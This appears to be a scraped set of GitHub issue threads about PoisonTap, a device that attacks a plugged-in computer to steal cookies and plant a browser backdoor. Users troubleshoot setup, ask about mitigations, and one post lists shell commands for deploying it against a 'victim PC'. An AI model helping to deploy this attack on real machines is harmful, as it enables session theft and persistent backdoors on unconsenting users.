As for the Armory, when I plug it in (this is all macOS Sierra), takes about 5-10 seconds and then it shows up in the network devices list on top. "Configure IPv4: DHCP", apparently gets an IP in the link local range (169.254.70.148 in my case). Does not respond to 1.0.0.1. Also can't SSH into the Armory anymore. Machine can still talk to the outside internet without issue.

I did all the setup on this machine, but before plugging it in, I removed it from the devices list and turned off connection sharing to the device so that it'd be starting from a blank slate without any of the setup steps I took to get things configured still in place.

/cc @abarisani in case you're interested.

License

Hello. I'd like to package this tool for ArchStrike but I couldn't find any license file. Can you add one?

Password asked to access the network ?

Hi, after doing this to ssh into my RPi, I followed everything in the README and then rebooted my Pi.

Now when I plugin my Pi into my computer (Debian 8 Jessie), Gnome asks me for a password for some reason and the connection cannot be made. I also had a different network profile (as described here) to give my Pi internet access but I deleted it as everything should now be working.

Thanks

Mac OS X mitigation

On my macOS Sierra the automatic network configuration only works when running as a "administrator" user. When running as a "standard" user a pop-up requests manual network configuration. This seems like an effective mitigation for the small additional effort to run as "standard".

Having trouble with the backdoor

When the pi is plugged in, posiontap kicks off just fine. The only problem I have is the backdoor is not connecting. I may be just a user error but I can't figure it out. Also there is a target_backdoor.js that has a link to a log.php. I didn't see a log.php in the repo or a connection like it in the backend_server.js
Thanks for any help.

osx mitigations?

Does anyone have any mitigations to prevent usb-ethernet adapters from being automatically connected to?

I've noticed the following behavior:
-If I create a new Network Location in the "Network" section of MacOS's System Preferences and the usb-ethernet adapter is plugged in, the new Location will automatically add the device to the list of adapters and connect to it.
-If I create a new Location without the device plugged in, activate that location, and then plug in the device, it will not be automatically added to the list of devices, nor automatically connected to.

mkdir not permitted on /sys/kernel/config

Hello ! Thanks for your work it looks very nice.

I have an issue on "pi_startup.sh"

I added /etc/init.d/pi_startup.sh in "/etc/rc.local" to start the script at boot but I got stuck on the first line, I can't mkdir on /sys/kernel/config. I check it is well mounted but even upon root I can't create any directory.

Any idea please ?

Donation address?

@samyk et al, well done! Is there a donation address to support your research? Super important in upgrading worldwide security. particularly distributing the code. Making it a very real threat is what will get these things fixed fast.







WebSocket code doesn't load/All backdoored sites return 404

I looked at #29 and am having a similar issue but their solutions are not working. The browsers (tested Safari and Chrome on Win10 and OS X) do not load the WebSocket backdoor. They all return 404 on all of the URLs I have tested like:
http://nfl.com/PoisonTap
http://weibo.com/PoisonTap
etc...

Normally I use an internal DNS server and figured this was the issue by looking at #55 but I have tested while using Google DNS and the issue still arises. Any ideas?

Running on RPi 2 without Ethernet to USB

I'm using a Raspberry Pi 2 powered by the power socket and connected to the victim (Windows 10 Laptop) with an Ethernet cable. I can successfully run ./pi_startup.sh with no errors after doing the following steps:

  • Installation instructions from README without the USB stuff and replaced all instances of usb0 with eth0 in /etc/network/interfaces:
echo -e "\nauto eth0\nallow-hotplug eth0\niface eth0 inet static\n\taddress 1.0.0.1\n\tnetmask 0.0.0.0" >> /etc/network/interfaces
echo "/bin/sh /home/pi/poisontap/pi_startup.sh" >> /etc/rc.local
mkdir /home/pi/poisontap
chown -R pi /home/pi/poisontap
apt-get update && apt-get upgrade
apt-get -y install isc-dhcp-server dsniff screen nodejs
cp /home/pi/poisontap/dhcpd.conf /etc/dhcp/dhcpd.conf
  • Replaced pi_startup.sh from @Z3r0byte https://github.com/Z3r0byte/poisontap/blob/master/pi_startup.sh

  • Rebooted the RPi, ran sudo ./poisontap/pi_startup.sh and it runs successfully without errors.

  • Connected to victim PC (has chrome open) with an Ethernet cable from RPi Ethernet port to victims Ethernet Port and rebooted the RPi. The victim PC successfully gets an IP of 1.0.0.10. Browsing is slower and spotty but apart from that nothing shows that PoisonTap is working. No cookies or such appear in /home/pi/poisontap/ . Am I supposed to run anything else on the RPi?

When attempting to run nodejs backend_server.js I get the same error as #24

/home/pi/poisontap/backend_server.js:9 var server = http.createServer((request, response) => {
SyntaxError: Unexpected token > at Module._compile (module.js:439:25) 
at Object.Module._extensions..js (module.js:474:10)
at Module.load (module.js:356:32)
at Function.Module._load (module.js:312:12)
at Function.Module.runMain (module.js:497:10)
at startup (node.js:119:16)
at node.js:902:3 

log.php not included - by design?

Hi,

I think I know the answer to this.. but the git repo doesn't include log.php. I'm guessing this is because it's a simple script that I should write myself just to log all input from the target_backdoor.js?

Thanks,

Would poisontap still work if Raspberry Pi Zero is turned into a USB-Computer?

Hello!

When I saw Poisontap I thought that it was a very great idea but hated the way it is mean to be used, with an additional micro-USB cable. Because of that, I looked for something different and found USB Armory, but it is too expensive, so I looked for a way to turn Raspberry Pi Zero into a USB-Computer.

I found this post but it modifies the Pi's hardware, so the exploit might not work. Anyone here knows if it would still work correctly?

Thank you.

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.